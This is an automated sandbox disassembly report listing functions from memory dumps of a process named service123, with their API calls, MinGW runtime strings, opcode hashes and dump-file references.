abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D44
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D51
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D56
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D60
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D65
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D7E

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: abort$Sleepstrlen
String ID:
API String ID: 68130653-0
Opcode ID: b8d4768bf2cea4622d0c6c0d5e73271485cc6b25c1e17bd86632bf92dbd487bd
Instruction ID: 9d8db9a88821dabc437d65a21636b25612bf77ed2113f524d36bffeecfc7d4ec
Opcode Fuzzy Hash: b8d4768bf2cea4622d0c6c0d5e73271485cc6b25c1e17bd86632bf92dbd487bd
Instruction Fuzzy Hash: 3351A5A064C3C5CEEB11EB39C04A765BFF46753308F084598DBDC4BA82D3BA5549CB6A

Function 6C2FD570 Relevance: 28.6, APIs: 19, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 3405c38f0d83f4af272141fe34c68ddd3ab5b9b18e7966a728bccfea454125c4
Instruction ID: 3ad66ca459459836366690b84773cde4fb37e7e70368fcfdd3457589091b64b9
Opcode Fuzzy Hash: 3405c38f0d83f4af272141fe34c68ddd3ab5b9b18e7966a728bccfea454125c4
Instruction Fuzzy Hash: 0531A47068930E8FE310DF59E480B6EF7E0AF85319F14892DE9A897B41D335E8458F82

Function 6C2FD67C Relevance: 28.5, APIs: 19, Instructions: 32COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D44
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D51
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D56
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D60
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D65
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D7E

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 6a978986521d2faa4f21e49faa05e83597843df431b75155095465bb83b63a9b
Instruction ID: 1479706bbaff09f4c3253506e2e0d00e92ceea2b9f1ddd5b27e37571b4d7fe1d
Opcode Fuzzy Hash: 6a978986521d2faa4f21e49faa05e83597843df431b75155095465bb83b63a9b
Instruction Fuzzy Hash: C5B01212FD9328C340003FAC04460B9F3385B033487007C00459733D010B00FCC98E57

Function 6C2FD6C0 Relevance: 27.1, APIs: 18, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: ca8bcc25fb516d436fec39f3d36311d7154fb6c291dbe8e4483d4614aaf5b769
Instruction ID: d43d2eaea1892d509426e850024aafd4467734489b052f93d6adf91a412a556e
Opcode Fuzzy Hash: ca8bcc25fb516d436fec39f3d36311d7154fb6c291dbe8e4483d4614aaf5b769
Instruction Fuzzy Hash: CC413870A4934A8FE310DF19C58075AFBE0EB89708F108D2EF9A9C7B51D375D8458B92

Function 6C2FD855 Relevance: 25.5, APIs: 17, Instructions: 45COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D44
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D51
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D56
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D60
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D65
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D7E

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 3b9167e47a15b4b3b6ba29507877dc635dbadff9ec812bf82faed4492d23d70c
Instruction ID: d2eeb82173f58a7644916bfc64cf5b5da2066633c5a5dd0f84d01b922653f298
Opcode Fuzzy Hash: 3b9167e47a15b4b3b6ba29507877dc635dbadff9ec812bf82faed4492d23d70c
Instruction Fuzzy Hash: B2E06571A4835F4BD710EE68D085729BBB16B4230CF541858D99627942C365B85FCB42

Function 6C30C330 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 130fileCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6C30C3A1
fwrite.MSVCRT ref: 6C30C448
fputs.MSVCRT ref: 6C30C465
fwrite.MSVCRT ref: 6C30C48E
fputs.MSVCRT ref: 6C30C4AD
fwrite.MSVCRT ref: 6C30C4DC
fwrite.MSVCRT ref: 6C30C50E
abort.MSVCRT ref: 6C30C513
abort.MSVCRT ref: 6C3C6157
free.MSVCRT ref: 6C3C615F

Part of subcall function 6C2FA340: strlen.MSVCRT ref: 6C2FA3C5
Part of subcall function 6C2FA340: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,6C30C41C), ref: 6C2FA3E0
Part of subcall function 6C2FA340: free.MSVCRT ref: 6C2FA3EA

Strings

not enough space for format expansion (Please submit full bug report at https://gcc.gnu.org/bugs/): , xrefs: 6C30C349
-, xrefs: 6C30C4C1
terminate called after throwing an instance of ', xrefs: 6C30C441
terminate called without an active exception, xrefs: 6C30C4D5

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: fwrite$abortfputsfreememcpy$strlen
String ID: -$not enough space for format expansion (Please submit full bug report at https://gcc.gnu.org/bugs/): $terminate called after throwing an instance of '$terminate called without an active exception
API String ID: 4144276882-4175505668
Opcode ID: df47dcfe9439efd85becd2c2272fa7fd40710869c06041d3bf330599c1471ca5
Instruction ID: 2c77ab8c66b820576b126cfeee978ef40b52321a8af15e7a1fbd0de86bc2fbc5
Opcode Fuzzy Hash: df47dcfe9439efd85becd2c2272fa7fd40710869c06041d3bf330599c1471ca5
Instruction Fuzzy Hash: 865125B2A083149FD700AF68C48979EBBF4AF85318F01891DE8D987741D7799989CF93

Function 6C2FD8A8 Relevance: 24.1, APIs: 16, Instructions: 52COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D44
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D51
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D56
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D60
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D65
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D7E

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 21b9cf6b38df07e0bb664a4a1bc6e4f2ff3c8a391aeb88bd500ad3aefdba02e0
Instruction ID: 86906bc4719d1e96d27ede9aa7ea8afbb6ec36be5897091932c09c187f82788d
Opcode Fuzzy Hash: 21b9cf6b38df07e0bb664a4a1bc6e4f2ff3c8a391aeb88bd500ad3aefdba02e0
Instruction Fuzzy Hash: 68F089B1AA534E4FD310DF18C481775BBB07B43315F481854D8941BB42C3259899CB92

Function 6C2FDE50 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 80COMMON

Download Yara Rule

Strings

@, xrefs: 6C2FDEB8

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: strlen
String ID: @
API String ID: 39653677-2766056989
Opcode ID: dde504998a7ae14c9df1ad4bca54c0d95ad93317ed066ff81a42c9b78974c5b4
Instruction ID: 8b7529e406f4bb53fb3d1686649899be06642ef4c8d0f29f0d229ec340333bc9
Opcode Fuzzy Hash: dde504998a7ae14c9df1ad4bca54c0d95ad93317ed066ff81a42c9b78974c5b4
Instruction Fuzzy Hash: 7921C371A4421E8BDB10DF54CC84BDDF7B8AB86319F1045A6DD29AB700E7309E8A8F80

Function 6C2FDA90 Relevance: 22.6, APIs: 15, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 8665fd36f5d601daa6c2b86d63b85e68815cbed05eee4266615d0df51509bfa7
Instruction ID: a02c39761cde7326c6fbb7b2a3dd13ba30f77f24d26a8820f0a9233800076f39
Opcode Fuzzy Hash: 8665fd36f5d601daa6c2b86d63b85e68815cbed05eee4266615d0df51509bfa7
Instruction Fuzzy Hash: 7F413C75A4421D9BCB10DF58C880BDEF7B1AF89318F1489A9DC59A7700D730AE89CF91

Function 6C2FDCE0 Relevance: 21.1, APIs: 14, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 730b82d2da7bc35f9127cbebe574e0472547f7dc119ace965d717b640774afe3
Instruction ID: 6b4bdc17a3d3c270ae3f63b8a5b4a53f4099ed420353aa187dc38dd826cb69b7
Opcode Fuzzy Hash: 730b82d2da7bc35f9127cbebe574e0472547f7dc119ace965d717b640774afe3
Instruction Fuzzy Hash: 9E111C75A4421C9BCB14DF68C8819DEB7B5AF85358F048964EC1967B01DB30AE4ACFE1

Function 6C2FDD80 Relevance: 19.6, APIs: 13, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fe2482c830eee9ded9460493a8ea6eab20a7d1ebb5a31b0fcc83bb6770a18bd
Instruction ID: 9223bfef9ed01f955c0e964b65ebe6c27f03bf165ffdc3f667b6e892de2a223b
Opcode Fuzzy Hash: 5fe2482c830eee9ded9460493a8ea6eab20a7d1ebb5a31b0fcc83bb6770a18bd
Instruction Fuzzy Hash: B5210675A0421E9BCF10DF64C8809DEF7B5AB89308F1088A8DD1967741DB30AE8ACF91

Function 6C300310 Relevance: 18.2, APIs: 12, Instructions: 165COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C3C395F), ref: 6C30034B
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C3C395F), ref: 6C300352
SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C3C395F), ref: 6C300360

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: ErrorLast$Value
String ID:
API String ID: 1883355122-0
Opcode ID: 366e659608ce5a7969ef58cbb62becbed610d6fae85d34ca4918fd216beac0ba
Instruction ID: 93b4c39d66b426c0f32843f6d2d1921b8dbee73df1769f12bb2338085ecf9d34
Opcode Fuzzy Hash: 366e659608ce5a7969ef58cbb62becbed610d6fae85d34ca4918fd216beac0ba
Instruction Fuzzy Hash: 4B516E767093418FCB01EF29C5C565ABBF5BB86308F15456CD88887B11EB32E845CF92

Function 00C11940 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 129fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 00C1196F
vfprintf.MSVCRT ref: 00C1198F
abort.MSVCRT ref: 00C11994
VirtualQuery.KERNEL32 ref: 00C11A2B

Strings

Address %p has no image-section, xrefs: 00C11AEB
VirtualProtect failed with code 0x%x, xrefs: 00C11AA6
Mingw-w64 runtime failure:, xrefs: 00C11968
VirtualQuery failed for %d bytes at address %p, xrefs: 00C11AD7

Memory Dump Source

Source File: 00000005.00000002.2931183608.0000000000C11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000005.00000002.2931163525.0000000000C10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931201942.0000000000C1A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931219875.0000000000C1E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931236780.0000000000C21000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c10000_service123.jbxd

Similarity

API ID: QueryVirtualabortfwritevfprintf
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 2513968241-1534286854
Opcode ID: 48a27bfe0459019d93739f6691824e348374469ceba83b2fc5bd7a518fa01910
Instruction ID: d7d14228316336cdca9bd196fa5641bb73395cd38cd08a15c0fb55375d4d6022
Opcode Fuzzy Hash: 48a27bfe0459019d93739f6691824e348374469ceba83b2fc5bd7a518fa01910
Instruction Fuzzy Hash: AD518EB15053008FC700DF29D88479EFBE0FF8A350F59C91DE9998B211D738D985AB92

Function 6C2FA690 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 129fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 6C2FA6BF
vfprintf.MSVCRT ref: 6C2FA6DF
abort.MSVCRT ref: 6C2FA6E4
VirtualQuery.KERNEL32 ref: 6C2FA77B

Strings

Mingw-w64 runtime failure:, xrefs: 6C2FA6B8
VirtualProtect failed with code 0x%x, xrefs: 6C2FA7F6
VirtualQuery failed for %d bytes at address %p, xrefs: 6C2FA827
Address %p has no image-section, xrefs: 6C2FA83B

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
